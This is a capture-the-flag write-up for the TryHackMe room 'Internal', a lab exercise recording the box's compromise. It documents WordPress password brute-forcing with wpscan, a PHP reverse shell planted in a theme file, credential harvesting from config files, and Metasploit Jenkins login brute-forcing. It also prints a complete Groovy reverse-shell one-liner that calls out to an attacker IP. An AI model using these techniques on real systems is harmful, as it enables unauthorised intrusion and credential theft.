WriteUP THM — Internal
Penetration Testing Challenge
This is a writeup for TryHackMe room Internal.
To start with, remember to add ip address to /etc/hosts as internal.thm.
Reconnaissance
start with nmap:
nmap -sC -sV -p- internal.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2020–10–17 15:23 EEST
Nmap scan report for 10.10.151.253
Host is up (0.053s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelEnumerate web server with gobuster:
gobuster -q -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.151.253 dir
/blog (Status: 301)
/wordpress (Status: 301)
/javascript (Status: 301)
/phpmyadmin (Status: 301)
/server-status (Status: 403)Since there is a wordpress site on the box let’s run wpscan:
wpscan — url http://internal.thm/blog — api-token __REDACTED__no vulnerabilities found. Let’s try to enumerate users:
wpscan — url http://internal.thm/blog -e uWe find out that there is an user called admin.
Gaining entry
Dictionary attack password with wpscan:
wpscan — url http://internal.thm/blog — usernames admin — passwords /usr/share/wordlists/rockyou.txt — max-threads 20After 63 seconds the password is revealed to be __REDACTED__.
Login to wordpress with that account. Edit theme, add php-reverse-shell.php to 404.php and navigate to the page to get reverse shell:
http://internal.thm/blog/wp-content/themes/twentyseventeen/404.phpBoom!
Privilege escalation
Upgrade TTY:
python -c 'import pty; pty.spawn("/bin/bash")'Enumerate with linPEAS.
Databases
Wordpress credentials:
wp-config.php files found:
/var/www/html/wordpress/wp-config.php
define( ‘DB_NAME’, ‘wordpress’ );
define( ‘DB_USER’, ‘wordpress’ );
define( ‘DB_PASSWORD’, ‘__REDACTED__’ );
define( ‘DB_HOST’, ‘localhost’ );phpmyadmin credentials:
cat /etc/phpmyadmin/config-db.php
<?php
##
## database access settings in php format
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf
## by /usr/sbin/dbconfig-generate-include
##
## by default this file is managed via ucf, so you shouldn't have to
## worry about manual changes being silently discarded. *however*,
## you'll probably also want to edit the configuration file mentioned
## above too.
##
$dbuser='phpmyadmin';
$dbpass='__REDACTED__';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='3306';
$dbtype='mysql';mysql database enumeration:
mysql -u wordpress -puse wordpress;
Database changedselect * from wp_users;
only admin user found and we already know the password.
phpadmin database: nothing interesting found. but can log in to phpadmin with the credentials.
Users
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
....
aubreanna:x:1000:1000:aubreanna:/home/aubreanna:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/falseSudo
Potentially exploitable depending on aubreanna’s sudo rights.
Sudo version 1.8.21p2Jenkins
looking at web servers running on localhost (netstat -nat) I find this:
curl http://127.0.0.1:8080
<html><head><meta http-equiv=’refresh’ content=’1;url=/login?from=%2F’/><script>window.location.replace(‘/login?from=%2F’);</script></head><body style=’background-color:white; color:white;’>Authentication required
<! —
You are authenticated as: anonymous
Groups that you are in:
Permission you need to have (but didn’t): hudson.model.Hudson.Read
… which is implied by: hudson.security.Permission.GenericRead
… which is implied by: hudson.model.Hudson.Administer
→</body></html>
This is Jenkins. Let’s set up reverse tunnel to attack. I’m using TryHackMe’s awesome browser based machine here to protect my own system. Use the -N flag to not spawn a shell and you can background the process after login.
ssh -N -R 8080:127.0.0.1:8080 root@10.10.3.78Fire up metasploit, use auxiliary/scanner/http/jenkins_login, admin, rockyou.txt
[+] 127.0.0.1:8000 — Login Successful: admin:__REDACTED__now running as user jenkins. You can get a shell with the Groovy script shown here.
String host=”10.8.108.247”;int port=5555;String cmd=”/bin/bash”;Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Looking at ps aux I notice that processes in the container are actually run in the host under user aubreanna . But nothing interesting in the container so far. I did a lot of searching to find out if I could escape the container and land a shell as aubreanna but didn’t find a way to do it. So back to enumeration.
Files
testing various find queries to find something interesting.
find / -iname "*flag*" 2>/dev/null
find / -user aubreanna 2>/dev/null
grep -Ril “aubreanna” 2>/dev/nullfinally lands me with a file with aubreanna’s login:
cat /opt/wp-save.txt
Bill,Aubreanna needed these credentials for something later. Let her know you have them and where they are.aubreanna:__REDACTED__
grab user flag:
cat /home/aubreanna/user.txt
THM{__REDACTED__}Root
After digging linPEAS findings for hours I don’t find anything exploitable so back to the container to see if I missed anything. I decide to do the same file tests that I did on the container:
find / -iname "*flag*" 2>/dev/null
find / -user aubreanna 2>/dev/null
grep -Ril “aubreanna” 2>/dev/nullBOOM!
cat /opt/note.txt
Aubreanna,Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you
need access to the root user account.root:__REDACTED__
Login and grab the flag.
cat root.txt
THM{__REDACTED__}That’s all folks! What a great machine with multiple services to explore and exploit. I spent hours on looking for vulnerabilities and should have paid more attention to the file system.